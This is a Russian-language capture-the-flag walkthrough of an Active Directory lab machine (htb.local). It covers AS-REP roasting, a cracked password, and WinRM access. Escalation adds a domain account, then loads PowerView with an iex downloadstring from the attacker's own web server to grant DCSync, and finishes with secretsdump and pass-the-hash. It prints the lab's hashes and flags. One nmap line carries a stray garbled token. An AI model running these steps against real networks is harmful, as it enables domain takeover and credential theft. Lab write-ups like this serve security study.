Обзор сервисов
Машине выдали IP-адрес 10.10.10.161. Проведем стандартную разведку с помощью nmap:
$ nmap -sV -sC -Pn -p1-65535 -oN 10.10.10.161 10.10.10.161
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-10 11:54 EDT
Nmap scan report for 10.10.10.161
Host is up (0.16s latency).
Not shown: 65511 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-10 16:10:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open 55eebfd4` Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49945/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2023-08-10T09:10:59-07:00
| smb2-time:
| date: 2023-08-10T16:11:01
|_ start_date: 2023-08-10T06:25:35
|_clock-skew: mean: 2h26m49s, deviation: 4h02m30s, median: 6m48s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 568.04 seconds```
Обратим внимание на кучу Active Directory сервисов и домен htb.local. Можем посмотреть некоторую информацию с помощью команды, однако приводить листинг сюда я не буду (слишком большой).
ldapsearch -H ldap://10.10.10.161 -x -b "dc=htb,dc=local"
Поищем учетные записи с помощью impacket-samrdump:
$ impacket-samrdump 10.10.10.161
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Retrieving endpoint list from 10.10.10.161
Found domain(s):
. HTB
. Builtin
[*] Looking up users in domain HTB
Found user: Administrator, uid = 500
Found user: Guest, uid = 501
Found user: krbtgt, uid = 502
Found user: DefaultAccount, uid = 503
Found user: $331000-VK4ADACQNUCA, uid = 1123
Found user: SM_2c8eef0a09b545acb, uid = 1124
Found user: SM_ca8c2ed5bdab4dc9b, uid = 1125
Found user: SM_75a538d3025e4db9a, uid = 1126
Found user: SM_681f53d4942840e18, uid = 1127
Found user: SM_1b41c9286325456bb, uid = 1128
Found user: SM_9b69f1b9d2cc45549, uid = 1129
Found user: SM_7c96b981967141ebb, uid = 1130
Found user: SM_c75ee099d0a64c91b, uid = 1131
Found user: SM_1ffab36a2f5f479cb, uid = 1132
Found user: HealthMailboxc3d7722, uid = 1134
Found user: HealthMailboxfc9daad, uid = 1135
Found user: HealthMailboxc0a90c9, uid = 1136
Found user: HealthMailbox670628e, uid = 1137
Found user: HealthMailbox968e74d, uid = 1138
Found user: HealthMailbox6ded678, uid = 1139
Found user: HealthMailbox83d6781, uid = 1140
Found user: HealthMailboxfd87238, uid = 1141
Found user: HealthMailboxb01ac64, uid = 1142
Found user: HealthMailbox7108a4e, uid = 1143
Found user: HealthMailbox0659cc1, uid = 1144
Found user: sebastien, uid = 1145
Found user: lucinda, uid = 1146
Found user: svc-alfresco, uid = 1147
Found user: andy, uid = 1150
Found user: mark, uid = 1151
Found user: santi, uid = 1152
Found user: malsius, uid = 9601
...
Сохраним в файл users.txt учетки:
Administrator
Guest
krbtgt
DefaultAccount
$331000-VK4ADACQNUCA
SM_2c8eef0a09b545acb
SM_ca8c2ed5bdab4dc9b
SM_75a538d3025e4db9a
SM_681f53d4942840e18
SM_1b41c9286325456bb
SM_9b69f1b9d2cc45549
SM_7c96b981967141ebb
SM_c75ee099d0a64c91b
SM_1ffab36a2f5f479cb
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxc0a90c9
HealthMailbox670628e
HealthMailbox968e74d
HealthMailbox6ded678
HealthMailbox83d6781
HealthMailboxfd87238
HealthMailboxb01ac64
HealthMailbox7108a4e
HealthMailbox0659cc1
sebastien
lucinda
svc-alfresco
andy
mark
santi
malsius
Проверим с помощью Metasploit наличие преаутентификации для AS-REP Roasting:
$ msfconsole
msf> use auxiliary/gather/kerberos_enumusers
msf6 auxiliary(gather/kerberos_enumusers) > set rhosts 10.10.10.161
msf6 auxiliary(gather/kerberos_enumusers) > set domain htb.local
msf6 auxiliary(gather/kerberos_enumusers) > set user_file ./users.txt
msf6 auxiliary(gather/kerberos_enumusers) > run
С помощью Metasploit мы проверяем, что на аккаунте svc-alfresco не включена преаутентификация.
Сохраняем хеш в файл hash.txt и брутим (AS-REP Roasting).
$ hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
svc-alfresco:s3rvice
Используем evil-winrm для получения доступа.
$ evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
Пользовательский флаг
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..\desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\desktop> dir
Directory: C:\Users\svc-alfresco\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/9/2023 11:26 PM 34 user.txt
*Evil-WinRM* PS C:\Users\svc-alfresco\desktop> type user.txt
0982d5458fac26c8cb209b44d933fde5
Повышение привилегий
Воспользуемся bloodhound-python. Нам нужно попытаться найти самый короткий путь до ценных учеток с правами Exchange Windows Permissions.
bloodhound-python -d htb.local -usvc-alfresco -p s3rvice -gc forest.htb.local -c all -ns 10.10.10.161
Добавим учетку john с группой Exchange Windows Permissions.
PS> net user john abc123! /add /domain
PS> net group "Exchange Windows Permissions" john /add
PS> net localgroup "Remote Management Users" john /add
Добавим учетке группу Exchange Windows Permissions.
PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" svc-alfresco /add /domain
The command completed successfully.
Далее выполним атаку DCSync (репликация Active Directory).
# скачаем PowerView
$ wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1
$ python3 -m http.server 8080
На удаленной машине через svc-alfresco:
PS> iex(new-object net.webclient).downloadstring("http://10.10.16.61:8080/PowerView.ps1")
PS> $pass = convertto-securestring 'abc123!' -asplain -force
PS> $cred = new-object system.management.automation.pscredential('htb\john', $pass)
PS> Add-ObjectACL -PrincipalIdentity john -Credential $cred -Rights DCSync
Теперь дампнем хеши:
$ impacket-secretsdump htb/[email protected]
abc123!
Нас интересует хеш htb.local\Administrator => aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6.
Теперь мы можем залогиниться с помощью Pass-the-Hash.
impacket-psexec [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
Флаг суперпользователя
C:\Windows\system32> cd \users\administrator\desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 61F2-A88F
Directory of C:\Users\Administrator\Desktop
09/23/2019 02:15 PM <DIR> .
09/23/2019 02:15 PM <DIR> ..
08/09/2023 11:26 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 10,374,438,912 bytes free
C:\Users\Administrator\Desktop> type root.txt
3943522b871a670aa7210efb6f98c92f
